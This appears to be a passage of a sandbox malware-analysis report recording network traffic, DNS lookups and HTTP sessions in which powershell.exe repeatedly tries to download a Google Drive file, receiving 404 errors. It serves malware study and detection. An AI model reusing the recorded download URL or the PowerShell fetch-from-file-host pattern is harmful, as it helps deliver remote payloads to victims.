Oct 1, 2024 07:46:45.360759020 CEST | 49755 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:49.360424995 CEST | 49756 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:49.360496044 CEST | 443 | 49756 | 142.250.185.142 | 192.168.2.4
Oct 1, 2024 07:46:49.360611916 CEST | 49756 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:49.360856056 CEST | 49756 | 443 | 192.168.2.4 | 142.250.185.142
Oct 1, 2024 07:46:49.360867977 CEST | 443 | 49756 | 142.250.185.142 | 192.168.2.4
                Oct 1, 2024 07:46:49.994260073 CEST44349756142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:49.995774031 CEST49756443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:49.995820999 CEST44349756142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:50.810659885 CEST44349756142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:50.810761929 CEST44349756142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:50.810815096 CEST49756443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:50.811256886 CEST49756443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:54.813374043 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:54.813431978 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:54.813574076 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:54.813858032 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:54.813877106 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:55.461891890 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:55.463813066 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:55.463848114 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:55.855707884 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:55.856528997 CEST44349757142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:55.856578112 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:55.856962919 CEST49757443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:55.858891010 CEST49758443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:55.858961105 CEST44349758142.250.184.193192.168.2.4
                Oct 1, 2024 07:46:55.859028101 CEST49758443192.168.2.4142.250.184.193
                Oct 1, 2024 07:46:59.860503912 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:59.860552073 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:46:59.860734940 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:59.867728949 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:46:59.867744923 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.525399923 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.526706934 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:00.526738882 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.922502995 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.922933102 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:00.923001051 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.923043966 CEST44349759142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:00.923049927 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:00.923084974 CEST49759443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:04.938021898 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:04.938077927 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:04.938170910 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:04.938400030 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:04.938410044 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:05.565171957 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:05.566939116 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:05.566982985 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:05.955993891 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:05.956909895 CEST44349760142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:05.956984997 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:05.957287073 CEST49760443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:09.955671072 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:09.955717087 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:09.955837011 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:09.956187963 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:09.956198931 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:10.649738073 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:10.651026964 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:10.651043892 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:11.032294989 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:11.033653975 CEST44349761142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:11.033850908 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:11.034430027 CEST49761443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:15.049834013 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:15.049880981 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:15.053935051 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:15.057818890 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:15.057835102 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:15.689404011 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:15.691019058 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:15.691035032 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:16.068867922 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:16.069704056 CEST44349762142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:16.069766045 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:16.077105045 CEST49762443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:16.086492062 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:16.086534977 CEST44349763142.250.184.193192.168.2.4
                Oct 1, 2024 07:47:16.086597919 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:16.086987019 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:16.086997032 CEST44349763142.250.184.193192.168.2.4
                Oct 1, 2024 07:47:16.090229034 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:16.131398916 CEST44349763142.250.184.193192.168.2.4
                Oct 1, 2024 07:47:16.774764061 CEST44349763142.250.184.193192.168.2.4
                Oct 1, 2024 07:47:16.774861097 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:16.774861097 CEST49763443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:20.142673969 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:20.142738104 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:20.142811060 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:20.143132925 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:20.143150091 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:21.030819893 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:21.032105923 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:21.032149076 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:21.417536020 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:21.417658091 CEST44349764142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:21.417745113 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:21.418107033 CEST49764443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:25.439142942 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:25.439196110 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:25.439259052 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:25.439639091 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:25.439656973 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:26.091983080 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:26.094033003 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:26.094044924 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:26.486068964 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:26.486660004 CEST44349765142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:26.486967087 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:26.489865065 CEST49765443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:30.485893011 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:30.485940933 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:30.490113974 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:30.490113974 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:30.490154028 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:32.320647001 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:32.322037935 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:32.322055101 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:32.942430019 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:32.943361044 CEST44349766142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:32.943798065 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:32.944746971 CEST49766443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:36.953794956 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:36.953851938 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:36.953963041 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:36.954364061 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:36.954377890 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:37.583050013 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:37.584673882 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:37.584713936 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:37.992053032 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:37.992120028 CEST44349767142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:37.992197990 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:37.992556095 CEST49767443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:42.004373074 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:42.004420996 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:42.004478931 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:42.004802942 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:42.004812956 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:42.634550095 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:42.638525963 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:42.638552904 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:43.026295900 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:43.027512074 CEST44349768142.250.185.142192.168.2.4
                Oct 1, 2024 07:47:43.029000044 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:43.029618025 CEST49768443192.168.2.4142.250.185.142
                Oct 1, 2024 07:47:43.033293009 CEST49769443192.168.2.4142.250.184.193
                Oct 1, 2024 07:47:43.033343077 CEST44349769142.250.184.193192.168.2.4
                Oct 1, 2024 07:47:43.033970118 CEST49769443192.168.2.4142.250.184.193
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Oct 1, 2024 07:45:39.922274113 CEST | 53384 | 53 | 192.168.2.4 | 1.1.1.1
                Oct 1, 2024 07:45:39.928955078 CEST | 53 | 53384 | 1.1.1.1 | 192.168.2.4
                Oct 1, 2024 07:45:41.171855927 CEST | 62471 | 53 | 192.168.2.4 | 1.1.1.1
                Oct 1, 2024 07:45:41.179214954 CEST | 53 | 62471 | 1.1.1.1 | 192.168.2.4
                Oct 1, 2024 07:45:52.956139088 CEST | 62126 | 53 | 192.168.2.4 | 1.1.1.1
                Oct 1, 2024 07:45:52.963403940 CEST | 53 | 62126 | 1.1.1.1 | 192.168.2.4
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Oct 1, 2024 07:45:39.922274113 CEST | 192.168.2.4 | 1.1.1.1 | 0xaee3 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                Oct 1, 2024 07:45:41.171855927 CEST | 192.168.2.4 | 1.1.1.1 | 0x37ad | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                Oct 1, 2024 07:45:52.956139088 CEST | 192.168.2.4 | 1.1.1.1 | 0x718d | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Oct 1, 2024 07:45:39.928955078 CEST | 1.1.1.1 | 192.168.2.4 | 0xaee3 | No error (0) | drive.google.com | | 142.250.184.238 | A (IP address) | IN (0x0001) | false
                Oct 1, 2024 07:45:41.179214954 CEST | 1.1.1.1 | 192.168.2.4 | 0x37ad | No error (0) | drive.usercontent.google.com | | 142.250.184.193 | A (IP address) | IN (0x0001) | false
                Oct 1, 2024 07:45:52.963403940 CEST | 1.1.1.1 | 192.168.2.4 | 0x718d | No error (0) | drive.google.com | | 142.250.185.142 | A (IP address) | IN (0x0001) | false
                Oct 1, 2024 07:45:55.204531908 CEST | 1.1.1.1 | 192.168.2.4 | 0x6374 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                Oct 1, 2024 07:45:55.204531908 CEST | 1.1.1.1 | 192.168.2.4 | 0x6374 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                • drive.google.com
                • drive.usercontent.google.com
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.4 | 49731 | 142.250.184.238 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:45:40 UTC | 215 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:45:41 UTC | 1610 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:41 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'nonce-0Bo8L6Bu6WXiEna8yF7JfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.4 | 49732 | 142.250.184.193 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:45:41 UTC | 233 | OUT | GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: drive.usercontent.google.com
                Connection: Keep-Alive
                2024-10-01 05:45:42 UTC | 1914 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=utf-8
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:42 GMT
                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                Cross-Origin-Opener-Policy: same-origin
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'nonce-q8oJJG7lrmgUDLiilGDf0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Length: 1652
                X-GUploader-UploadID: AD-8ljt1RjSv6hgWhcRactfyOsekMzQoC07JjKpaABR2hR8xVe1RT2GaqfvZpggRr918ay4YGoq842yUKA
                Server: UploadServer
                Set-Cookie: NID=517=TYYrH7PW08eA_e5U2OuC4zmekvTUxL9y9Z0hSYlicR1c__kVJQs5xULdovxIj3IMXPMi_rdS8LNeC_fCziXbKGAjzcMEW4yG8zarYR9db8593BfYRuwpe5m1rfnmNFR8-YVfvaeNQ2W03vkoB6kiM4lLNwH7YtVvhCXyrPd0UQxAzsyZ3d0; expires=Wed, 02-Apr-2025 05:45:42 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Content-Security-Policy: sandbox allow-scripts
                Connection: close
                2024-10-01 05:45:42 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZoyEy_VbYMuWSjRM_EHE_A">*{margin:0;padding:0}html,code{font:15px/22px arial


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.4 | 49733 | 142.250.184.238 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:45:47 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:45:47 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:47 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: script-src 'report-sample' 'nonce-C4iCy1tiJMhhz6Blmce_XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Cross-Origin-Opener-Policy: same-origin
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                3 | 192.168.2.4 | 49734 | 142.250.184.193 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:45:48 UTC | 139 | OUT | GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1
                Host: drive.usercontent.google.com
                Connection: Keep-Alive
                2024-10-01 05:45:48 UTC | 1599 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=utf-8
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:48 GMT
                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                Content-Security-Policy: script-src 'report-sample' 'nonce-_i0DtfREUVVlSIbKtp4JLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Cross-Origin-Opener-Policy: same-origin
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Length: 1652
                X-GUploader-UploadID: AD-8ljtljf0Ewfhqytx9iVo7nmtP2yYDqdRfk7K-KlU9Y2zyHbcMNuBPlWiupVMk9e0Ipjdkp8Lla0uERA
                Server: UploadServer
                Set-Cookie: NID=517=ayNybyF5N2eBPQYwkElV42dGDAo7dQDQxiFHFSICxvzYeUHQ8Auvb772g32F6tMuhU37CAI3kwDYH70R6YO3RPT0tciihaowI_fgJk0hB8bBGjogaqzZOxwWUoixwbKaXp4mZtGQuSZMsktz1QUq2laaEbkFMssVx1YBcZsGm_RpJq13Zw; expires=Wed, 02-Apr-2025 05:45:48 GMT; path=/; domain=.google.com; HttpOnly
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Content-Security-Policy: sandbox allow-scripts
                Connection: close
                2024-10-01 05:45:48 UTC | 1599 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AeJ4rqXmTNw6gXlVYmYGhA">*{margin:0;padding:0}html,code{font:15px/22px arial
                2024-10-01 05:45:48 UTC | 53 | IN | Data Ascii: this server. <ins>That’s all we know.</ins></main>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                4 | 192.168.2.4 | 49737 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:45:53 UTC | 97 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                2024-10-01 05:45:54 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:53 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Content-Security-Policy: script-src 'report-sample' 'nonce-aUZkpgS42Yx6qjCXjCohyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Cross-Origin-Opener-Policy: same-origin
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                5 | 192.168.2.4 | 49743 | 142.250.185.142 | 443 | 7444 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-10-01 05:45:58 UTC | 121 | OUT | GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1
                Host: drive.google.com
                Connection: Keep-Alive
                2024-10-01 05:45:59 UTC | 1319 | IN | HTTP/1.1 303 See Other
                Content-Type: application/binary
                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                Pragma: no-cache
                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                Date: Tue, 01 Oct 2024 05:45:59 GMT
                Location: https://drive.usercontent.google.com/download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download
                Strict-Transport-Security: max-age=31536000
                Cross-Origin-Opener-Policy: same-origin
                Content-Security-Policy: script-src 'report-sample' 'nonce-lMgX3qgHlDodSvq8gGixvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                Server: ESF
                Content-Length: 0
                X-XSS-Protection: 0
                X-Frame-Options: SAMEORIGIN
                X-Content-Type-Options: nosniff
